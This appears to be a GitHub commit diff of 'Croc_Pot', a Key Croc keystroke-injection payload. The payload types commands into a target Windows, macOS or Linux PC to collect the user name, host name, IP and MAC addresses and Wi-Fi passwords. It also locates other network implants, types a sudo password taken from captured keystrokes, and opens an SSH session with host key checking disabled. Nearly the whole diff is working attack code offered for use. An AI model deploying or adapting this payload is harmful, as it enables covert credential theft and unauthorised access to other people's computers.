Darren Kitchen
GitHub
commit
c8837ed3a4
|
|
@ -1,10 +1,9 @@
|
|||
# Title: Croc_Pot Payload
|
||||
# Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection
|
||||
# This will collect some data off target PC
|
||||
# (ip address, current user name, pc host name, ssid and passwd, mac address)
|
||||
# This will collect some data off target PC (ip address, current user name, pc host name, ssid and passwd, mac address)
|
||||
# save to tools/Croc_pot folder
|
||||
# Author: Spywill
|
||||
# Version: 1.3.1
|
||||
# Version: 1.3.6
|
||||
# Category: Key Croc
|
||||
|
||||
MATCH crocpot
|
||||
|
|
@ -12,14 +11,19 @@ MATCH crocpot
|
|||
#---> Edit KEYCROC_PASSWD_HERE
|
||||
CROC_PW=hak5croc
|
||||
|
||||
#---> Check for target pc saved passwd run CrocUnlock payload first if not edit below
|
||||
if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then
|
||||
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
||||
else
|
||||
#---> Edit LINUX-PC_PASSWD_HERE
|
||||
PC_PW=LINUX
|
||||
PC_PW=LINUX
|
||||
fi
|
||||
|
||||
#---> Save keycroc passwd in temp folder
|
||||
#---> This is used for starting Reverse SSH Tunnel with Target PC
|
||||
echo "${CROC_PW}" >> /tmp/CPW.txt
|
||||
|
||||
#----Create Croc_Pot folders
|
||||
#---> Create Croc_Pot folders
|
||||
if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
|
||||
LED B
|
||||
else
|
||||
|
|
@ -74,16 +78,38 @@ WINDOWS)
|
|||
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 3
|
||||
#---> Ping network to look for Shark Jack
|
||||
Q STRING "ping -n 1 shark.lan | select-string -pattern 'Reply'"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 3
|
||||
#---> Place Shark Jack IP into variable
|
||||
Q STRING "\$jack_mac = [System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString"
|
||||
Q ENTER
|
||||
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "arp -a \$jack_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||
Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\""
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Ping network to look for Lan turtle
|
||||
Q STRING "ping -n 1 turtle.lan | select-string -pattern 'Reply'"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "[System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
|
||||
Q ENTER
|
||||
sleep 3
|
||||
#---> Place Lan turtle IP into variable
|
||||
Q STRING "\$turtle_mac = [System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString"
|
||||
Q ENTER
|
||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "arp -a 172.16.84.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
|
||||
Q STRING "arp -a \$turtle_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\" -noclobber -append"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||
|
|
@ -94,7 +120,7 @@ WINDOWS)
|
|||
ATTACKMODE HID
|
||||
sleep 1
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Entering keycroc passwd
|
||||
|
|
@ -106,9 +132,11 @@ WINDOWS)
|
|||
echo "$TARGET_IP" >> ${CROC_OS}
|
||||
echo "$TARGET_HOSTNAME" >> ${CROC_OS}
|
||||
echo "$HOST_IP" >> ${CROC_OS}
|
||||
#---> Edit with sed to remove powershell output "r" endlines & remove first character
|
||||
#---> Edit with sed to remove powershell output "r" endlines & sed return only readable character & replace "-" with ":"
|
||||
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
||||
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
||||
$(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
||||
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt)
|
||||
$(sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
||||
#---> Starting Croc_Pot
|
||||
Q STRING "/root/udisk/tools/Croc_Pot.sh"
|
||||
Q ENTER ;;
|
||||
|
|
@ -124,7 +152,7 @@ MACOS)
|
|||
Q ENTER
|
||||
sleep 2
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Entering keycroc passwd
|
||||
|
|
@ -147,16 +175,23 @@ LINUX)
|
|||
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
|
||||
case $TARGET_HOSTNAME in
|
||||
raspberrypi)
|
||||
#---> Start Raspberry pi 4 terminal -->gnome-terminal installed<--
|
||||
#---> Copy LXTerminal to desktop
|
||||
Q GUI d
|
||||
Q CONTROL-ALT-F1
|
||||
sleep 1
|
||||
Q STRING "terminal"
|
||||
Q STRING "cp -u /usr/share/applications/lxterminal.* /home/\$(whoami)/Desktop"
|
||||
Q ENTER
|
||||
Q ALT-F7
|
||||
#---> Start Raspberry pi 4 LXTerminal
|
||||
sleep 1
|
||||
Q STRING "LXTerminal"
|
||||
Q ENTER
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Place keycroc usb drive into variable
|
||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "whoami | tee \${PC_USER}"
|
||||
Q ENTER
|
||||
|
|
@ -177,12 +212,20 @@ raspberrypi)
|
|||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||
|
|
@ -193,7 +236,7 @@ raspberrypi)
|
|||
ATTACKMODE HID
|
||||
sleep 1
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Entering keycroc passwd
|
||||
|
|
@ -214,24 +257,18 @@ parrot)
|
|||
Q STRING "mate-terminal"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Create keycroc directory
|
||||
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
|
||||
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
|
||||
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0; sudo chmod 777 /media/\$(whoami)/KeyCroc/; "
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Entering Linux passwd
|
||||
Q STRING "${PC_PW}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Mount keycroc usb drive to target pc
|
||||
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Make KeyCroc folder executable
|
||||
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Place keycroc usb drive into variable
|
||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "whoami | tee \${PC_USER}"
|
||||
Q ENTER
|
||||
|
|
@ -252,12 +289,20 @@ parrot)
|
|||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 5
|
||||
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||
|
|
@ -273,9 +318,9 @@ parrot)
|
|||
#---> Remove keycroc directory off target pc
|
||||
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
sleep 1
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Entering keycroc passwd
|
||||
|
|
@ -297,24 +342,18 @@ parrot)
|
|||
Q STRING "xterm"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Create keycroc directory
|
||||
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
|
||||
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
|
||||
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0; sudo chmod 777 /media/\$(whoami)/KeyCroc/; "
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Entering Linux passwd
|
||||
Q STRING "${PC_PW}"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Mount keycroc usb drive to target pc
|
||||
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Make KeyCroc folder executable
|
||||
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Place keycroc usb drive into variable
|
||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||
Q STRING "whoami | tee \${PC_USER}"
|
||||
Q ENTER
|
||||
|
|
@ -335,12 +374,20 @@ parrot)
|
|||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 5
|
||||
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||
Q STRING "arp 172.16.84.1 | awk '/'172.16.84.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||
|
|
@ -356,9 +403,9 @@ parrot)
|
|||
#---> Remove keycroc directory off target pc
|
||||
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
|
||||
Q ENTER
|
||||
sleep 2
|
||||
sleep 1
|
||||
#---> Start SSH session with target PC
|
||||
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||
Q ENTER
|
||||
sleep 1
|
||||
#---> Entering keycroc passwd
|
||||
|
|
|
|||
Loading…
Reference in New Issue